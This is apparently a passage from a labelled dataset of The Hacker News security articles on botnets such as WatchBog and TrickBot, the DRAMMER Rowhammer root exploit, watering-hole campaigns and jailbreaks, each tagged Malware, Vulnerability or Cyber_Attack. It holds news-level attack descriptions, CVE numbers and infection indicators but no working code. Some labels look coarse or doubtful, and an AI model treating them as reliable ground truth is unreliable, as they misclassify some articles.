The security updates include a patch for the reported zero-day flaw, along with a fix for an ""important"" DLL hijacking vulnerability (CVE-2018-15983), which could allow attackers to gain privilege escalation via Flash Player and load a malicious DLL.
",Malware
Linux Botnet Adding BlueKeep-Flawed Windows RDP Servers to Its Target List,https://thehackernews.com/2019/07/linux-malware-windows-bluekeep.html,"Cybersecurity researchers have discovered a new variant of WatchBog, a Linux-based cryptocurrency mining malware botnet, which now also includes a module to scan the Internet for Windows RDP servers vulnerable to the Bluekeep flaw.
BlueKeep is a highly-critical, wormable, remote code execution vulnerability in the Windows Remote Desktop Services that could allow an unauthenticated remote attacker to take full control over vulnerable systems just by sending specially crafted requests over RDP protocol.
Though the patches for the BlueKeep vulnerability (CVE–2019-0708) was already released by Microsoft in May this year, more than 800,000 Windows machines accessible over the Internet are still vulnerable to the critical flaw.
Fortunately, even after many individuals in the security community developed working remote code exploits for BlueKeep, there is no public proof-of-concept (PoC) exploit available till the date, potentially preventing opportunistic hackers from wreaking havoc.
However, cybersecurity firm Immunity just yesterday released an updated version of its commercial automated vulnerability assessment and penetration testing (VAPT) tool, CANVAS 7.23, which includes a new module for the BlueKeep RDP exploit.
It appears the attackers behind WatchBog are using their botnet network to prepare ""a list of vulnerable systems to target in the future or to sell to third party vendors for profit,"" warned the researchers from Intezer Lab, who discovered the new WatchBog variant.
""The incorporation of the BlueKeep scanner by a Linux botnet may indicate WatchBog is beginning to explore financial opportunities on a different platform,"" the researchers said.
The BlueKeep scanner included in WatchBog scans the Internet and then submits the list of newly discovered RDP hosts, as a hexadecimal data string encrypted using RC4, to the attacker-controlled servers.
According to the researcher, the new WatchBog variant has already compromised more than 4,500 Linux machines in the last two months.
Although WatchBog is operating since late last year, attackers are distributing its new variant in an ongoing campaign active since early June this year.
The newly-discovered WatchBog variant includes a new spreading module along with exploits for some recently patched vulnerabilities in Linux applications, allowing attackers to find and compromise more Linux systems rapidly.
The WatchBog Linux botnet malware contains several modules, as structurally briefed below, which leverages recently patched vulnerabilities in Exim, Jira, Solr, Jenkins, ThinkPHP and Nexus applications to compromise Linux machines.
Pwn Module
CVE-2019-11581 (Jira)
CVE-2019-10149 (Exim)
CVE-2019-0192 (Solr)
CVE-2018-1000861 (Jenkins)
CVE-2019-7238 (Nexus Repository Manager 3)
Scanning Module
BlueKeep Scanner
Jira Scanner
Solr Scanner
Brute-forcing Module
CouchDB instances
Redis instances
Spreading Module
Apache ActiveMQ (CVE-2016-3088)
Solr (CVE-2019-0192)
Code Execution over Redis
After scanning and brute-forcing modules discover a Linux machine running the vulnerable application, WatchBog deploys a script on the targeted machine to download Monero miner modules from Pastebin website.
The malicious script then also gains persistence on the infected system via crontab and further downloads a new spreader module, which comes in the form of a dynamically linked Cython-compiled ELF executable.
Researchers have recommended Linux and Windows administrators to keep their software and operating systems up-to-date against known vulnerabilities in order to prevent themselves from being a victim of such attack campaigns.
You can find if WatchBog has infected your Linux machine by checking the existence of the ""/tmp/.tmplassstgggzzzqpppppp12233333"" file or the ""/tmp/.gooobb"" file on your system.
",Malware
Bitcoin Talk forum hacked; Database for Sale by Hacker; Website currently down,https://thehackernews.com/2013/10/bitcoin-talk-forum-hacked-database-for.html,"Bitcoin Talk, the popular Bitcoin discussion forum, has been hacked and as it stands the site is currently unreachable.
Bitcointalk has been down for nearly 6 hours. The forums have been allegedly hacked and Defaced by ""The Hole Seekers"" and selling 150,000 emails and hashed passwords stolen from Bitcointalk.org for 25 Bitcoins, where the passwords are hashed with sha256crypt.
Hacker embedded the ""1812 Overture"" song in the background with a dazzling animated picture show.
According to Bitcointalk admin Theymos, it's possible that the hackers gained access to the database. He says the website will not be restored until he figures out precisely what vulnerability the hackers leveraged. He's offering 50 Bitcoin to the first individual who can pinpoint the security hole.
See the video below for the Hack-in-Action:
""Hello friend, Bitcoin has been seized by the FBI for being illegal. Thanks, bye"" reads one the message in the video.
To be safe, it is recommended that all Bitcoin Forum users consider any password used on the Bitcoin Forum in 2013 to be insecure.
There is no further information available currently, but on a Reddit thread the source code of Bitcointalk and JavaScript payload have been made available online for anyone to download.
",Vulnerability
Malware infected International Atomic Energy Agency Computers,https://thehackernews.com/2013/10/malware-infected-international-atomic.html,"Hackers and malware are everywhere, waiting for you around every corner of the Internet. The International Atomic Energy Agency (IAEA), which holds highly sensitive information and plays a key role in global efforts to prevent the spread of nuclear weapons, said on Tuesday that some of its computers were infected by malicious software, during the past several months.
Malware can typically be used by cyber-attackers to gain remote access to systems, or to steal data, however spokesman Serge Gas said. ""No data from the IAEA network has been affected.""
The computers were located in common areas of the agency's Vienna headquarters, known as the Vienna International Centre (VIC).
A third-party technician or visitor with the USB-drive infected with crimeware can be used to infect the system. ""The (IAEA) secretariat does not believe that the USB devices themselves were infected or that they could spread the malware further"" he said.
Last November, the IAEA revealed that Iranian hackers had accessed one of its former computer servers and posted the contact details of some of the watchdog's experts online.
""Protecting information is vital to the IAEA's work. The agency continuously endeavours to achieve the highest possible level of protection of information,"" Gas said.
The authority did not go into explicit details regarding the malware itself, but did stress that the use of removable media had to be reviewed and tightened.
",Malware
"Mirage Anti-Bot 2.0 : Protection against ZeuS, SpyEye Malwares",https://thehackernews.com/2012/02/mirage-anti-bot-20-protection-against.html,"Mirage Anti-Bot 2.0 : Protection against ZeuS, SpyEye Malwares
Jean-Pierre aka DarkCoderSc and Fred De Vries Develop and Release the second version of Another great security tool named ""Mirage Anti-Bot 2.0"". Zeus and SpyEye were the two main families of botnet software. These types of malware are spread mainly through drive-by downloads and phishing schemes.
They are so-called Trojan horses which are designed to steal credentials from various online services like social networks (such as Facebook, Hi5, Yahoo, Netlog), online banking accounts (phising), ftp-accounts, email-accounts and other. They are part of botnets that are estimated to include millions of compromized computers.
Because your antivirus program is not always giving you enough protection against these types of malware, so Experts at https://unremote.org/ create this program for you, that can be used as an extra layer of security. Mirage Anti-Bot will be downloading and installing one or more blocklists from www.abuse.ch, a reputable Swiss-based anti-malware website. This effectively stops your computer from reaching infected sites, thus minimizing the risk to be infected with this extremely dangerous type of malware.
Changelog :
[+] Installer
[+] New GUI, More pro
[+] Start with Windows
[+] Protect you against Palevo, TDL3, Rogues, C&C etc..
[+] Protect you against spyeye botnet
[+] Confirm on quit
[+] Limit exceed bug fixed, now it grabs data locally using SSL
[+] Proxy authentification added
Download Mirage Anti-Bot 2.0
",Malware
"LuckyMouse Hackers Target Banks, Companies and Governments in 2020",https://thehackernews.com/2021/04/luckymouse-hackers-target-banks.html,"An adversary known for its watering hole attacks against government entities has been linked to a slew of newly detected intrusions targeting various organizations in Central Asia and the Middle East.
The malicious activity, collectively named ""EmissarySoldier,"" has been attributed to a threat actor called LuckyMouse, and is said to have happened in 2020 with the goal of obtaining geopolitical insights in the region. The attacks involved deploying a toolkit dubbed SysUpdate (aka Soldier) in a number of breached organizations, including government and diplomatic agencies, telecom providers, a TV media company, and a commercial bank.
LuckyMouse, also referred to as APT27 and Emissary Panda, is a sophisticated cyberespionage group that has a history of breaching multiple government networks in Central Asia and the Middle East. The actor has also been linked to cyberattacks aimed at transnational organizations such as the International Civil Aviation Organization (ICAO) in 2019 and recently attracted attention for exploiting ProxyLogon flaws to compromise the email server of a governmental entity in the Middle East.
EmissarySoldier is only the latest in a series of surveillance efforts aimed at the targets.
""In order to compromise victims, LuckyMouse typically uses watering holes, compromising websites likely to be visited by its intended targets, ESET malware researcher Matthieu Faou said in a report published today. ""LuckyMouse operators also perform network scans to find vulnerable internet-facing servers run by their intended victims.""
What's more, ESET also observed LuckyMouse infections on an unspecified number of internet-facing systems running Microsoft SharePoint, which the researchers suspect occurred by taking advantage of remote code execution vulnerabilities in the application.
Regardless of the method used to gain an initial foothold, the attack chain culminates in the deployment of custom post-compromise implants, SysUpdate or HyperBro, both of which leverage DLL search order hijacking to load malicious payloads and thwart detection. ""The trident model features a legitimate application vulnerable to DLL hijacking, a custom DLL that loads the payload, and a raw Shikata Ga Nai-encoded binary payload,"" Faou noted.
For its part, SysUpdate functions as a modular tool, with each component devoted to a particular operational purpose. It involves abusing a benign application as a loader for a malicious DLL, which in turn loads the first-stage payload that ultimately decodes and deploys the memory implant on the compromised system. Since its discovery in 2018, the toolkit has undergone numerous revisions devoted to adding new functionalities, indicating that the operators are actively working to revamp their malware arsenal.
""LuckyMouse was increasingly active throughout 2020, seemingly going through a retooling process in which various features were being incrementally integrated into the SysUpdate toolkit,"" Faou said. ""This may be an indicator that the threat actors behind LuckyMouse are gradually shifting from using HyperBro to SysUpdate.""
",Malware
New 'unc0ver' Tool Can Jailbreak All iPhone Models Running iOS 11.0 - 14.3,https://thehackernews.com/2021/03/new-unc0ver-tool-can-jailbreak-all.html,"A popular jailbreaking tool called ""unc0ver"" has been updated to support iOS 14.3 and earlier releases, thereby making it possible to unlock almost every single iPhone model using a vulnerability that Apple in January disclosed was actively exploited in the wild.
The latest release, dubbed unc0ver v6.0.0, was released on Sunday, according to its lead developer Pwn20wnd, expanding its compatibility to jailbreak any device running iOS 11.0 through iOS 14.3 using a kernel vulnerability, including iOS 12.4.9-12.5.1, 13.5.1-13.7, and 14.0-14.3.
Tracked as CVE-2021-1782, the flaw is a privilege escalation vulnerability in the kernel stemming from a race condition that could cause a malicious application to elevate its privileges.
""We wrote our own exploit based on CVE-2021-1782 for #unc0ver to achieve optimal exploit speed and stability,"" Pwn20wnd said in a separate tweet.
The vulnerability has since been addressed by Apple as part of its iOS and iPadOS 14.4 updates released on January 26, 2021, but not before admitting that the issue may have been under active attack by bad actors.
The iPhone maker, however, did not disclose how widespread the attack was or reveal the identities of the attackers actively exploiting them.
Jailbreaking, similar to rooting on Google's Android, involves a privilege escalation that works by exploiting flaws in iOS to grant users root access and full control over their devices. In doing so, it allows iOS users to remove software restrictions imposed by Apple, thereby allowing access to additional customization and otherwise prohibited apps.
For its part, Apple has steadily made it difficult to jailbreak devices by locking down its hardware and software for security reasons, which it says helps counter malware attacks.
ZecOps CEO Zuk Avraham said the jailbreak is ""yet another example that attackers have an edge on iOS vs. defenders,"" adding ""[Apple] needs to stop the need to jailbreak the device in the first place and should just enable users to have full access without a need to run an exploit.""
Last May, the unc0ver team released a similar jailbreak for iPhones running iOS 11 to iOS 13.5 by exploiting a memory consumption issue in the kernel (CVE-2020-9859). But it was patched by Apple in a matter of days with the release of iOS 13.5.1 to prevent the vulnerability from being exploited maliciously.
",Vulnerability
TrickBot Malware Gets UEFI/BIOS Bootkit Feature to Remain Undetected,https://thehackernews.com/2020/12/trickbot-malware-gets-uefibios-bootkit.html,"TrickBot, one of the most notorious and adaptable malware botnets in the world, is expanding its toolset to set its sights on firmware vulnerabilities to potentially deploy bootkits and take complete control of an infected system.
The new functionality, dubbed ""TrickBoot"" by Advanced Intelligence (AdvIntel) and Eclypsium, makes use of readily available tools to check devices for well-known vulnerabilities that can allow attackers to inject malicious code in the UEFI/BIOS firmware of a device, granting the attackers an effective mechanism of persistent malware storage.
""This marks a significant step in the evolution of TrickBot as UEFI level implants are the deepest, most powerful, and stealthy form of bootkits,"" the researchers said.
""By adding the ability to canvas victim devices for specific UEFI/BIOS firmware vulnerabilities, TrickBot actors are able to target specific victims with firmware-level persistence that survives re-imaging or even device bricking capability.""
UEFI is a firmware interface and a replacement for BIOS that improves security, ensuring that no malware has tampered with the boot process. Because UEFI facilitates the loading of the operating system itself, such infections are resistant to OS reinstallation or replacement of the hard drive.
TrickBot emerged in 2016 as a banking trojan but has since evolved into a multi-purpose malware-as-a-service (MaaS) that infects systems with other malicious payloads designed to steal credentials, email, financial data, and spread file-encrypting ransomware such as Conti and Ryuk.
Its modularity and versatility have made it an ideal tool for a diverse set of threat actors despite attempts by cyber vendors to take the infrastructure down. It has also been observed in conjunction with Emotet campaigns to deploy Ryuk ransomware.
""Their most common attack chain largely begins via Emotet malspam campaigns, which then loads TrickBot and/or other loaders, and moves to attack tools like PowerShell Empire or Cobalt Strike to accomplish objectives relative to the victim organization under attack,"" the researchers said. ""Often, at the end of the kill-chain, either Conti or Ryuk ransomware is deployed.""
To date, the botnet has infected more than a million computers, according to Microsoft and its partners at Symantec, ESET, FS-ISAC, and Lumen.
From a Reconnaissance Module to an Attack Function
The newest addition to their arsenal suggests that TrickBot can not only be used to target systems en masse with ransomware and UEFI attacks but also provide criminal actors even more leverage during ransom negotiation by leaving a covert UEFI bootkit on the system for later use.
The development is also yet another sign that adversaries are extending their focus beyond the operating system of the device to lower layers to avoid detection and carry out destructive or espionage-focused campaigns.
TrickBot's reconnaissance component, observed for the first time in October 2020 right after the take-down attempts orchestrated by the US Cyber Command and Microsoft, targets Intel-based systems from Skylake through Comet Lake chipsets to probe for vulnerabilities in the UEFI firmware of the infected machines.
Specifically, the researchers found that TrickBoot takes aim at the SPI flash chip that houses the UEFI/BIOS firmware, using an obfuscated copy of RWEverything tool's RwDrv.sys driver to check if the BIOS control register is unlocked and the contents of the BIOS region can be modified.
Although the activity is limited to reconnaissance so far, it wouldn't be a stretch if this capability is extended to write malicious code to the system firmware, thereby ensuring that attacker code executes before the operating system and paving the way for the installation of backdoors, or even the destruction of a targeted device.
What's more, given the size and scope of the TrickBot, an attack of this kind can have severe consequences.
""TrickBoot is only one line of code away from being able to brick any device it finds to be vulnerable,"" the researchers noted. ""The national security implications arising from a widespread malware campaign capable of bricking devices is enormous.""
With UEFI persistence, ""TrickBot operators can disable any OS level security controls they want, which then allows them to re-surface to a modified OS with neutered endpoint protections and carry out objectives with unhurried time on their side.""
To mitigate such threats, it's recommended that the firmware is kept up-to-date, BIOS write protections are enabled, and firmware integrity is verified to safeguard against unauthorized modifications.
",Cyber_Attack
#Security Alert : Facebook Two-Factor Authentication fail !,https://thehackernews.com/2012/03/security-alert-facebook-two-factor.html,"#Security Alert : Facebook Two-Factor Authentication fail !
Last year Facebook has launched a security feature called Login Approvals or two-factor authentication. This is a follow-up security update regarding Facebook Login from Facebook. They have already integrated Facebook login email alerts to get notification emails or SMS messages whenever a suspicious person uses your Facebook account from a different location.
Christopher Lowson, on his blog explains the Facebook Two-Factor Authentication, which is really another biggest fail of Facebook Security.
But that feature is not enough to ensure your account's security and that is why Facebook has launched ""Login Approvals"". This feature is very similar with Google 2-step verification which associates a mobile device with your Facebook account and authenticates the login by sending a verification code at your mobile phone device.
According to this feature, When user will logging into your Facebook account from a new device, a code will be sent to his phone which he will have to enter before he is granted access to your Facebook Account.
What Lowson did, He click the option ""I can't get my code"" and noticed ""Skip this and stop asking me to enter codes"" and After clicking this he got asked ""Log in without entering codes from now on?"" by Facebook. Finally Lowson is able to login without Codes and 2 step authentication Security feature Turned off and Bypassed simply by options.
Conclusion is that, Why Facebook is trying to use such security features which can be easily exploited at user end ? Even a very less percentage of facebook users are aware about this feature which is actually implemented last year and still have such bugs.
Submitted By: Christopher Lowson
",Vulnerability
"Security researchers will disclose vulnerabilities in Embedded, ARM, x86 & NFC",https://thehackernews.com/2012/07/security-researchers-will-disclose.html,"Security researchers are expected to disclose new vulnerabilities in near field communication (NFC), mobile baseband firmware, HTML5 and Web application firewalls next week at the Black Hat USA 2012 security conference.
The Black Hat session aim to expose sometimes shocking vulnerabilities in widely used products. They also typically show countermeasures to plug the holes.
Two independent security consultants will give a class called ""Advanced ARM exploitation,"" part of a broader five-day private class the duo developed. In a sold-out session, they will detail hardware hacks of multiple ARM platforms running Linux, some described on a separate blog posting.
The purpose of the talk is to reach a broader audience and share the more interesting bits of the research that went into developing the Practical ARM Exploitation and presenters Stephen Ridley and Stephen Lawler demonstrate how to defeat XN, ASLR, stack cookies, etc. using nuances of the ARM architecture on Linux.
In addition to mobile and Web security, Black Hat presentations will also cover security issues and attack techniques affecting industrial control systems, smart meters and embedded devices.
",Malware
Internet Explorer zero-day exploit used watering hole attacks to target Japanese users,https://thehackernews.com/2013/09/internet-explorer-zero-day-exploit-used.html,"Attackers exploiting a zero-day vulnerability CVE-2013-3893 in Microsoft's Internet Explorer browser and served them on compromised popular Japanese news websites.
According to FireEye, at least three major Japanese media websites were compromised in watering hole attacks, dubbed Operation DeputyDog, appears to target manufacturers, government entities and media organizations in Japan.
The compromised sites recorded more than 75,000 page views before the exploits were discovered. The zero-day vulnerability in IE 8 and 9 allows the stealthy installation of software in the users' computers which then can be remotely accessed by the hackers.
The hackers typically use Trojans designed specifically for a pay-to-order attack to steal intellectual property. Researchers saw a payload executable file used against a Japanese target posing as an image file hosted on a Hong Kong server.
The attack in Japan was discovered two days after Microsoft disclosed the flaw ,""The exploit was attacking a Use After Free vulnerability in IE's HTML rendering engine (mshtml.dll) and was implemented entirely in Javascript (no dependencies on Java, Flash etc.), but did depend on a Microsoft Office DLL which was not compiled with ASLR (Address Space Layout Randomization) enabled,"" Microsoft Security Advisory.
FireEye also claimed the group responsible for DeputyDog is the same one that compromised security firm Bit9 back in February 2013. FireEye did not disclose which sites were infected, but said that Japanese computer security authorities were working with the media outlets to remediate the issue.
Microsoft released a FixIt tool and urged IE users to install that as a mitigation until a patch was ready.
",Vulnerability
Microsoft Tuesday Update to Patch Critical Windows and Internet Explorer Vulnerabilities,https://thehackernews.com/2014/08/microsoft-tuesday-update-to-patch_8.html,"Today Microsoft has released its Advance Notification for the month of August 2014 Patch Tuesday Updates releasing a total of nine security Bulletins, which will address several vulnerabilities in its products, out of which two are marked critical and rest are important in severity.
The latest updates, which is set to arrive on August 12, will address two critical bugs affect Internet Explorer and Windows with seven other issues rated as important. The vulnerabilities in the company's products range from remote code execution to protection bypasses.
Both of the critical fixes will address remote-code execution flaws. The critical Windows update affects only business and professional editions of Windows 7 and Windows 8. Whereas, the Internet Explorer update affects all versions of Windows on all supported platforms.
The remaining seven updates affect its various products, including Windows, Office, SQL Server, the .NET Framework and SharePoint Server 2013.
There will be no critical bulletins for Windows Server this month, also the IE patch is considered a moderate risk for servers. However, several bulletins are rated 'important' and should be updated with the patch.
The Tuesday Update will also addresses a remote-code execution vulnerability in Microsoft Office, rated as 'important', and an elevation of privilege vulnerability in SQL Server. The company will also fix Microsoft Server Software for another elevation of privilege vulnerability.
Rest three bulletins will address a pair of elevation of privilege vulnerabilities and a security bypass vulnerability in Windows.
Earlier this week, Microsoft also announced that the company will release a change to its Internet Explorer on Update Tuesday that will block old and out-of-date ActiveX controls. It will warn users when the browser attempts to load an out-dated ActiveX controls. Initially, the list will contain only old Java versions.
The out-of-date ActiveX control blocking feature works on:
Windows 7 SP1, Internet Explorer 8 through Internet Explorer 11
Windows 8 and up, Internet Explorer for the desktop
All Security Zones—such as the Internet Zone—but not the Local Intranet Zone and the Trusted Sites Zone
Note: Microsoft will not release any security update for its older version of Windows XP, as it stopped supporting Windows XP Operating System. So, if you are still running this older version of operating system on your PCs, we again advise you to move on to other operating system in order to receive updates and secure yourself from upcoming threats.
",Vulnerability
What is Threat Intelligence and How It Helps to Identify Security Threats,https://thehackernews.com/2015/11/what-is-cyber-threat-intelligence.html,"Simply put, threat intelligence is knowledge that helps you identify security threats and make informed decisions. Threat intelligence can help you solve the following problems:
How do I keep up to date on the overwhelming amount of information on security threats…including bad actors, methods, vulnerabilities, targets, etc.?
How do I get more proactive about future security threats?
How do I inform my leaders about the dangers and repercussions of specific security threats?
Threat Intelligence: What is it?
Threat intelligence has received a lot of attention lately. While there are many different definitions, here are a few that get quoted often:
Threat intelligence is evidence-based knowledge, including context, mechanisms, indicators, implications and actionable advice, about an existing or emerging menace or hazard to assets that can be used to inform decisions regarding the subject's response to that menace or hazard. – Gartner
The set of data collected, assessed and applied regarding security threats, threat actors, exploits, malware, vulnerabilities and compromise indicators – SANS Institute
Why is everyone talking about it?
Verizon's 2015 DBIR estimated a financial loss of $400 million from 700 million compromised records, which resulted from 79,790 security incidents!
As long as security threats and breaches occur, every business will look for ways to protect their data. The threat landscape is always changing and the business risk is increasing because of our dependence on IT systems.
Threats come from internal as well as external sources. Bottom line is, organizations are under tremendous pressure to manage threats. Though information in the form of raw data is available abundantly, it is hard and time-consuming to get meaningful information based on which proactive measures can be set.
This naturally pulls more and more users towards threat intelligence as it helps to prioritize threats within the deluge of data, alerts, and attacks and provides actionable information.
The table below presents several common indicators of compromise that can be identified with threat intelligence feeds:
Category Indicators of Compromise Examples
Network
IP addresses
URLs
Domain names
Malware infections targeting internal hosts that are communicating with known bad actors
Email
Sender's email address and email subject
Attachments
Links
Phishing attempts where internal hosts click on an unsuspecting email and ""phone home"" to a malicious command and control server
Host-Based
Filenames and file hashes (e.g. MD5)
Registry keys
Dynamic link libraries (DLLs)
Mutex names
External attacks from hosts that might be infected themselves or are already known for nefarious activity
Threat Intelligence capabilities
Attacks can be broadly categorized as user based, application based and infrastructure based threats. Some of the most common threats are SQL injections, DDoS, web application attacks and phishing.
It is important to have an IT security solution that provides threat intelligence capabilities to manage these attacks by being both proactive and responsive.
Attackers are constantly changing their methods to challenge security systems. Therefore, it becomes inevitable for organizations to get threat intelligence from a variety of sources.
One of the proven methods to stay on top of attacks is to detect and respond to threats with a SIEM (Security Information & Event Management system).
A SIEM can be used to track everything that happens in your environment and identify anomalous activities. Isolated incidents might look unrelated, but with event correlation and threat intelligence, you can see what is actually happening in your environment.
Nowadays, IT security professionals must operate under the assumed breach mentality. Comparing monitored traffic against known bad actors sourced from threat intelligence would help in identifying malicious activities.
However, this could be manual and time-consuming. Integrating indicator based threat intelligence to a SEIM security solution would help in identifying compromised system and possibly even prevent some attacks.
Best Practices
Integrating threat intelligence and responding to attacks is not enough to combat the ever-changing threat landscape. You need to analyze the situation and determine threats you are likely to face, based on which you can come up with precautionary measures.
Here is a list of several best practices:
Have an application whitelist and blacklist. This helps in preventing execution of malicious or unapproved programs including, .DLL files, scripts and installers.
Check your logs carefully to see if an attempted attack was an isolated event, or if the vulnerability had been exploited before.
Determine what was changed in the attempted attack.
Audit logs and identify why this incident happened – reasons could range from system vulnerability to an out-of-date driver.
What will threat intelligence enabled SIEM solve
A SIEM, like SolarWinds Log & Event Manager, collects and normalizes log data from monitored traffic and automatically tags suspicious events.
With integrated threat intelligence mechanism and built-in rules, the monitored events can be compared against the list of constantly updated known bad actors.
You can quickly search & monitor for hits from the bad actors against the log data in real time and identify common indicators of compromise.
You can automatically respond with actions like blocking known bad IP addresses, in case of malicious attack attempts.
Watch how threat intelligence works in a SIEM and download your free trial of a leading SIEM from SolarWinds.
",Vulnerability
New Drammer Android Hack lets Apps take Full control (root) of your Phone,https://thehackernews.com/2016/10/root-android-phone-exploit.html,"Earlier last year, security researchers from Google's Project Zero outlined a way to hijack the computers running Linux by abusing a design flaw in the memory and gaining higher kernel privileges on the system.
Now, the same previously found designing weakness has been exploited to gain unfettered ""root"" access to millions of Android smartphones, allowing potentially anyone to take control of affected devices.
Researchers in the VUSec Lab at Vrije Universiteit Amsterdam have discovered a vulnerability that targets a device's dynamic random access memory (DRAM) using an attack called Rowhammer.
Although we are already aware of the Rowhammer attack, this is the very first time when researchers have successfully used this attack to target mobile devices.
What is DRAM Rowhammer Attack?
The Rowhammer attack against mobile devices is equally dangerous because it potentially puts all critical data on millions of Android phones at risk, at least until a security patch is available.
The Rowhammer attack involves executing a malicious application that repeatedly accesses the same ""row"" of transistors on a memory chip in a tiny fraction of a second in a process called ""Hammering.""
As a result, hammering a memory region can disturb neighboring row, causing the row to leak electricity into the next row which eventually causes a bit to flip. And since bits encode data, this small change modifies that data, creating a way to gain control over the device.
In short, Rowhammer is an issue with new generation DRAM chips in which repeatedly accessing a row of memory can cause ""bit flipping"" in an adjacent row that could allow anyone to change the value of contents stored in the memory.
Is Your Android Phone Vulnerable?
To test the Rowhammer attack on mobile phones, the researchers created a new proof-of-concept exploit, dubbed DRAMMER, and found their exploit successfully altered crucial bits of data in a way that completely roots big brand Android devices from Samsung, OnePlus, LG, Motorola, and possibly other manufacturers.
The researchers successfully rooted Android handsets including Google's Nexus 4 and Nexus 5; LG's G4; Samsung Galaxy S4 and Galaxy S5, Motorola's Moto G models from 2013 and 2014; and OnePlus One.
""Not only does our [DRAMMER] attack show that practical, deterministic Rowhammer attacks are a real threat to billions of mobile users, but it is also the first effort to show that Rowhammer is...(reliably exploitable) on any platform other than x86 and with a much more limited software feature set than existing solutions,"" the researchers wrote in their paper [PDF] titled, ""Drammer: Deterministic Rowhammer Attacks on Mobile Platforms.""
How does the DRAMMER Attack Work? (Exploit Source Code)
The researchers created an app — containing their rooting exploit — that requires no special user permissions in order to avoid raising suspicion. The DRAMMER attack would then need a victim to download the app laced with malware (researchers' exploit code) to execute the hack.
The researchers took advantage of an Android mechanism called the ION memory allocator to gain direct access to the dynamic random access memory (DRAM).
Besides giving every app direct access to the DRAM, the ION memory allocator also allows identifying adjacent rows on the DRAM, which is an important factor for generating targeted bit flips.
Knowing this, the researchers then had to figure out how to use the bit flipping to achieve root access on the victim's device, giving them full control of the target phone and the ability to do anything from accessing data to taking photos.
""On a high level, our technique works by exhausting available memory chunks of different sizes to drive the physical memory allocator into a state in which it has to start serving memory from regions that we can reliably predict,"" the paper reads.
""We then force the allocator to place the target security-sensitive data, i.e., a page table, at a position in physical memory which is vulnerable to bit flips and which we can hammer from adjacent parts of memory under our control.""
Once you download this malicious app, the DRAMMER exploit takes over your phone within minutes – or even seconds – and runs without your interaction. The attack continues to run even if you interact with the app or put your phone in ""sleep"" mode.
The researchers expect to soon publish an app [source code available here] that will let you test your Android smartphone yourself and anonymously include your results in a running tally, which will help researchers track the list of vulnerable devices.
DRAMMER Has No Quick Fix
The group of researchers privately disclosed its findings to Google in July, and the company designated the flaw as ""critical,"" awarding the researchers $4,000 under its bug bounty program.
Google says the company has informed its manufacturing partners of the issue earlier this month and has developed a mitigation which it will include in its upcoming November security bulletin to make the DRAMMER attack much harder to execute.
However, the researchers warned that one could not replace the memory chip in Android smartphones that have already been shipped.
And even some software features that DRAMMER exploits are so fundamental and essential to any OS that they are difficult to remove or modify without impacting the user experience.
In short, the attack is not easy to patch in the next generation of Android phones.
Video Demonstration of DRUMMER Attack on Android 6.0.1
The researchers have also published two proof-of-concept videos that demonstrate DRAMMER attack in action against an unrooted LG Nexus 5.
In the first video, the phone is running Android 6.0.1 with security patches Google released on October 5.
In the second video, the researchers show how the DRAMMER attack can be combined with Stagefright bug that remains unpatched in many older Android handsets.
The Stagefright exploit gives the researchers an advanced shell, and by running the DRAMMER exploit, the shell gains root access.
The researcher's exploit can target the majority of the world's Android phones.
""Our research shows that practical large-scale Rowhammer attacks are a serious threat and while the response to the Rowhammer has been relatively slow from vendors, we hope our work will accelerate mitigation efforts both in industry and academia,"" the researchers concluded.
The group research focuses on Android rather than iOS because the researchers are intimately familiar with the Google's mobile OS which is based on Linux. But the group says it would theoretically be possible to replicate the same attack in an iPhone with additional research.
A team of researchers from VUSec at Vrije Universiteit Amsterdam, the University of California at Santa Barbara, and the Graz University of Technology has conducted the research, and they'll be presenting their findings later this week at the 23rd ACM Conference on Computer and Communications Security in Vienna, Austria.
For more detailed information, you can head on to this informational page about DRAMMER and this paper published early this morning.
",Malware
"Linux worm targeting Routers, Set-top boxes and Security Cameras with PHP-CGI Vulnerability",https://thehackernews.com/2013/11/Linux-ELF-malware-php-cgi-vulnerability.html,"A Symantec researcher has discovered a new Linux worm, targeting machine-to-machine devices, and exploits a PHP vulnerability (CVE-2012-1823) to propagate that has been patched as far back as May 2012.
Linux worm, which has been dubbed Linux.Darlloz, poses a threat to devices such as home routers and set-top boxes, Security Cameras, and even industrial control systems. It is based on proof-of-concept code released in late October and it helps spread malware by exploiting a vulnerability in php-cgi.
""Upon execution, the worm generates IP addresses randomly, accesses a specific path on the machine with well-known ID and passwords, and sends HTTP POST requests, which exploit the vulnerability. If the target is unpatched, it downloads the worm from a malicious server and starts searching for its next target."" the Symantec researchers explained.
The malware does not appear to perform any malicious activity other than silently spreading itself and wiping a load of system files.
So far the malware variant targets x86 systems, because the malicious binary downloaded from the attacker's server is in ELF (Executable and Linkable Format) format for Intel architectures.
However, the Symantec researchers claim the attacker also hosts variants of the worm for other architectures including ARM, PPC, MIPS and MIPSEL.
No attacks have been reported in the wild, but warned that most users would not realize they were at risk as they would be unaware that their own devices ran on Linux.
To protect their devices from the worm, users are advised to update their software to the latest version, make device passwords stronger and block incoming HTTP POST requests to the -/cgi-bin/php* paths.
",Malware
23-Year-old Russian Hacker confessed to be original author of BlackPOS Malware,https://thehackernews.com/2014/01/23-year-old-russian-hacker-confessed-to.html,"In the previous reports of Cyber Intelligence firm 'IntelCrawler' named Sergey Tarasov, a 17-year-old teenager behind the nickname ""ree[4]"", as the developer of BlackPOS malware.
BlackPOS also known as ""reedum"" or 'Kaptoxa' is an effective crimeware kit, used in the massive heist of possibly 110 million consumers' Credit-Debit cards, and personal information from the TARGET.
Later Researchers's investigation revealed that the original coder of BlackPOS Malware was actually a 23-year-old young hacker named Rinat Shabayev and the teen, Sergey Taraspov is the incharge for the technical support department.
In an interview with Russian channel 'LifeNews', Rinat Shabayev admitted that he had developed the BlackPOS crimeware kit. He clarified that the program developed by him was not meant for any kind of data theft, instead the program was written for the security testing.
He developed the malware with the help of another programmer with anonymous identity, whom he had met online. His original plan was just to sell the exploit, not to use it for malicious intent by himself.
His friend took the readymate codes from him and added more features to it. In addition to this information, he also confessed that the exploit can be used for malicious purposes too.
Researchers at IntelCrawler say that the same malware may have also been involved in the Neiman Marcus attack too.
Whatever be the intention of the programmer, but now more than 110 million people are suffering credit card theft because of his software. Even after knowing that the malware has ability to compile a massive financial theft, his justifications are not enough to be innocent.
",Malware
Researcher Found TextSecure Messenger App Vulnerable to Unknown Key-Share Attack,https://thehackernews.com/2014/11/textsecure-private-messenger-vulnerable_2.html,"Do you use TextSecure Private Messenger for your private conversations? If yes, then Are you sure you are actually using a Secure messaging app?
